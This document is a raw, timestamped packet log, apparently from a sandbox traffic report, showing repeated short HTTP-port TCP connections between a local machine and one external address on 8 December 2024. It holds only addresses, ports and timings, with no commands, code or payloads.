                                                                                                                      Dec 8, 2024 15:28:10.757500887 CET4979880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:10.758619070 CET8049811185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:10.758706093 CET4981180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:10.758836985 CET4981180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:10.759490013 CET4981280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:10.800641060 CET8049810185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:10.879547119 CET8049811185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:10.880474091 CET8049812185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:10.880520105 CET4981280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:10.880629063 CET4981280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:10.891927958 CET8049810185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:10.891999960 CET4981080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:11.000087023 CET8049812185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:11.107023001 CET4981180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:11.230386972 CET8049811185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:11.230448008 CET8049811185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:11.232026100 CET4981280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:11.351594925 CET8049812185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:11.351681948 CET8049812185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:11.351691961 CET8049812185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:12.098699093 CET8049811185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:12.138209105 CET4981180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.200032949 CET8049812185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:12.247545958 CET4981280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.332377911 CET8049811185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:12.372616053 CET4981180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.432145119 CET8049812185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:12.481946945 CET4981280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.555484056 CET4981180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.555485010 CET4981280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.555805922 CET4981880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.675183058 CET8049818185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:12.675230026 CET8049811185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:12.675407887 CET4981180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.675410032 CET4981880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.675534964 CET4981880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.675884962 CET8049812185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:12.678369045 CET4981280192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:12.794934988 CET8049818185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:13.028896093 CET4981880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:13.148771048 CET8049818185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:13.148809910 CET8049818185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:13.148824930 CET8049818185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:14.013664007 CET8049818185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:14.060076952 CET4981880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:14.248296022 CET8049818185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:14.294531107 CET4981880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:14.369168043 CET4982480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:14.490175009 CET8049824185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:14.490294933 CET4982480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:14.490434885 CET4982480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:14.610342979 CET8049824185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:14.842083931 CET4982480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:14.961452961 CET8049824185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:14.961519003 CET8049824185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:14.961544037 CET8049824185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:15.827668905 CET8049824185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:15.872612000 CET4982480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:16.060230970 CET8049824185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:16.106952906 CET4982480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:16.179985046 CET4982480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:16.180166960 CET4983080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:16.299465895 CET8049830185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:16.299685001 CET8049824185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:16.299777031 CET4982480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:16.299787998 CET4983080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:16.299949884 CET4983080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:16.422625065 CET8049830185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:16.654006958 CET4983080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:16.774172068 CET8049830185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:16.774569988 CET8049830185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:16.774601936 CET8049830185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:17.342241049 CET4983380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:17.342464924 CET4983080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:17.464817047 CET8049833185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:17.464927912 CET4983380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:17.465262890 CET8049830185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:17.465312004 CET4983080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:17.478996038 CET4983380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:17.532598972 CET4981880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:17.539814949 CET4983780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:17.598347902 CET8049833185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:17.659307957 CET8049837185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:17.659425020 CET4983780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:17.698935032 CET4983780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:17.819032907 CET8049837185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:17.915318012 CET4983380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:18.036164045 CET8049833185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:18.036237001 CET8049833185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:18.044586897 CET4983780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:18.166896105 CET8049837185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:18.166906118 CET8049837185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:18.166920900 CET8049837185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:18.795914888 CET8049833185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:18.841368914 CET4983380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.028336048 CET8049833185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:19.037163973 CET8049837185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:19.075722933 CET4983380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.091332912 CET4983780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.268606901 CET8049837185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:19.325712919 CET4983780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.382812023 CET4983780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.382811069 CET4983380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.383153915 CET4983880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.502525091 CET8049838185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:19.502551079 CET8049837185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:19.502626896 CET4983780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.502793074 CET4983880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.502793074 CET4983880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.503366947 CET8049833185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:19.506362915 CET4983380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.622780085 CET8049838185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:19.857165098 CET4983880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:19.978355885 CET8049838185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:19.978395939 CET8049838185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:19.978529930 CET8049838185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:20.866543055 CET8049838185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:20.919466972 CET4983880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:21.100059032 CET8049838185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:21.153819084 CET4983880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:21.213378906 CET4984480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:21.340321064 CET8049844185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:21.340435028 CET4984480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:21.340581894 CET4984480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:21.459839106 CET8049844185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:21.685225010 CET4984480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:21.804713011 CET8049844185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:21.804723978 CET8049844185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:21.804738045 CET8049844185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:22.673475981 CET8049844185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:22.731976032 CET4984480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:22.908338070 CET8049844185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:22.950732946 CET4984480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:23.038450003 CET4985080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:23.038572073 CET4984480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:23.157890081 CET8049850185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:23.158246040 CET8049844185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:23.158330917 CET4984480192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:23.158510923 CET4985080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:23.158510923 CET4985080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:23.277826071 CET8049850185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:23.513469934 CET4985080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:23.633344889 CET8049850185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:23.633498907 CET8049850185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:23.633507967 CET8049850185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.046144962 CET4983880192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.046462059 CET4985680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.046677113 CET4985080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.165669918 CET8049856185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.165750027 CET4985680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.165904045 CET4985680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.167509079 CET8049850185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.167576075 CET4985080192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.168226957 CET4985780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.285142899 CET8049856185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.287503004 CET8049857185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.287570000 CET4985780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.287689924 CET4985780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.407938957 CET8049857185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.513361931 CET4985680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.632921934 CET8049856185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.632949114 CET8049856185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.638345003 CET4985780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:24.757886887 CET8049857185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.757898092 CET8049857185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:24.757900953 CET8049857185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:25.562987089 CET8049856185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:25.607044935 CET4985680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:25.800937891 CET8049856185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:25.841386080 CET4985680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:26.934431076 CET8049857185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:26.982024908 CET4985780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.168299913 CET8049857185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.216356039 CET4985780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.288331985 CET4985680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.288335085 CET4985780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.288664103 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.409336090 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.409349918 CET8049857185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.409420967 CET4985780192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.409425020 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.409579039 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.409889936 CET8049856185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.409939051 CET4985680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.533168077 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.764698029 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:27.885030985 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.885071039 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:27.885128021 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:28.752886057 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:28.810128927 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:28.992626905 CET8049863185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.044522047 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.116481066 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.240586996 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.240677118 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.240799904 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.360136986 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.591556072 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:29.710968971 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.710978031 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:29.710988045 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.578612089 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.622613907 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.812388897 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.812932014 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.813620090 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.813664913 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.929155111 CET4986380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.930860043 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.933068037 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.933136940 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.933264971 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:30.934355021 CET8049869185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:30.934396982 CET4986980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.050590992 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.050666094 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.050756931 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.052746058 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.170931101 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.279798985 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.401961088 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.403704882 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.403992891 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:31.524527073 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.524574041 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:31.524620056 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.343777895 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.369805098 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.388246059 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.419483900 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.576565981 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.608395100 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.622636080 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.653884888 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.726397038 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.726449013 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.726743937 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.846730947 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.846781969 CET8049875185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.846787930 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.846834898 CET4987580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.846945047 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.847229004 CET8049876185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:32.847279072 CET4987680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:32.966176987 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:33.200897932 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:33.320602894 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:33.320614100 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:33.320621014 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:34.203406096 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:34.248039007 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.442789078 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:34.497615099 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.554730892 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.674335957 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:34.674506903 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.674662113 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:34.793945074 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:35.028986931 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:35.148494005 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:35.148544073 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:35.148638010 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.024429083 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.075767994 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.256392956 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.310164928 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.376523972 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.376626968 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.496191025 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.496260881 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.496345043 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.496422052 CET8049883185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.496473074 CET4988380192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.615798950 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.841520071 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:36.963623047 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.963682890 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:36.963692904 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.592237949 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.592536926 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.711560965 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.711663008 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.712145090 CET8049889185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.712198019 CET4988980192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.717772961 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.717827082 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.837150097 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.837174892 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:37.837244034 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.837368011 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:37.956672907 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.075958014 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:38.185285091 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:38.195360899 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.195467949 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.304807901 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.304852009 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:38.304920912 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.035151005 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.075762033 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.168108940 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.216650009 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.268614054 CET8049895185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.325784922 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.339266062 CET8049881185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.342439890 CET4988180192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.400542021 CET8049896185.246.67.73192.168.2.4
                                                                                                                      Dec 8, 2024 15:28:39.450772047 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.522659063 CET4989580192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.522906065 CET4989680192.168.2.4185.246.67.73
                                                                                                                      Dec 8, 2024 15:28:39.522911072 CET4990280192.168.2.4185.246.67.73
